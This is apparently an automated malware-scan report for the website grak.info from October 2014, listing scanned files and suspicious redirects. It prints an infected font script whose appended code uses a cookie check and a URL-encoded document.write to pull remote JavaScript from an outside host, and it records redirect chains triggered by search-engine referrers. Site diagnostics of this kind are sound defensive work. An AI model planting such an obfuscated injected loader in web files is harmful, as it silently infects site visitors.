Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grak.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://grak.info/ | 200 OK Content-Length: 28877 Content-Type: text/html | clean |
http://grak.info/engine/classes/js/jquery.js | 200 OK Content-Length: 93637 Content-Type: application/javascript | clean |
http://grak.info/engine/classes/js/jqueryui.js | 200 OK Content-Length: 64860 Content-Type: application/javascript | clean |
http://grak.info/engine/classes/js/dle_js.js | 200 OK Content-Length: 24985 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js | 200 OK Content-Length: 17380 Content-Type: text/javascript | clean |
http://grak.info/engine/editor/scripts/webfont.js | 200 OK Content-Length: 3461 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function LoadFont(fontFamily) { if(fontFamily != "") { try { fontFamily=fontFamily.split("'").join(''); WebFont.load({google:{families:[fontFamily + "::latin,cyrillic"]}}) }catch(e) { } } } function EmbedFont(id) { var arrSysFonts = ["impact", "palatino linotype", "tahoma", "century gothic", "lucida sans unicode", "times new roman", "arial narrow", "verdana", "copperplate gothic light", "lucida console", "gill sans mt", "trebuche } } } }); if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://grak.info/templates/Default/js/libs.js | 200 OK Content-Length: 1437 Content-Type: application/javascript | clean |
http://counter.rambler.ru/top100.jcn?2935385 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://grak.info/about.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:26 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://all-open-24.com/ | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:40:35 GMT Location: http://doctorhecrew.com Server: nginx/1.6.2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | clean |
http://doctorhecrew.com/ | 500 Server closed connection without sending any data back Content-Length: 105 Content-Type: text/plain | clean |
http://doctorhecrew.com/test404page.js | 500 Server closed connection without sending any data back Content-Length: 105 Content-Type: text/plain | clean |
http://grak.info/publication/ | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:27 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/diary/ | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:27 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/contacts.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:27 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/16-kakoy-prognoz-na-2014-god.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:27 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/15-chto-segodnya-proishodit-s-internet-reklamoy-prinimayutsya-novye-zakony-po-kontrolyu-i-uporyadochivaniyu-rasprostraneniya-informacii-v-internete-kotoryy-poluchaet-nezakonnye-dengi-za-schet.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:27 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/11-v-zhurnale-tpa-regulyarno-razmeschayutsya-vospominaniya-veteranov-armaturostroeniya-eta-istoricheskaya-publicistika-kak-to-vliyaet-na-razvitie-armaturostroeniya.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:27 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/10-socialnye-seti-prishli-v-otrasl-armaturostroeniya-eto-novoe-yavlenie-v-razvitii-informacionnyh-tehnologiy-chto-eto-dast-specialistamarmaturschikam.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/9-v-kakom-sostoyanii-prebyvaet-rynok-truboprovodnoy-armatury-segodnya-v-avguste-2013-goda.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/12-pochemu-chasto-v-internete-melkaet-2020-god-kak-polnoe-zavershenie-krizisa-kakov-dolgosrochnyy-prognoz-po-prodazham-armatury.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/2-post2.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/3-post3.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/6-chto-budet-s-kitayskoy-armaturoy.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/5-4-vash-prognoz-razvitiya-otrasli-i-rynka-tpa-na-blizhayshie-2-3-goda.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/8-o-molodezhi-kotoraya-idet-v-armaturu-chto-samoe-cennoe-oni-dolzhny-imet-chtoby-uspeshno-rabotat.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/7-v-chem-otlichie-krizisa-2008-09-godov-ot-togo-krizisa-chto-proishodit-seychas-v-promyshlennosti.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:28 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/main/1-post1.html | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:29 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
http://grak.info/page/2/ | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:23:29 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://grak.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: grak.info Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 18:23:23 GMT Location: http://all-open-24.com/ Server: nginx/0.7.64 Content-Type: text/html; charset=iso-8859-1 | suspicious |
URL: http://all-open-24.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: all-open-24.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 18:40:32 GMT Location: http://doctorhecrew.com Server: nginx/1.6.2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | suspicious |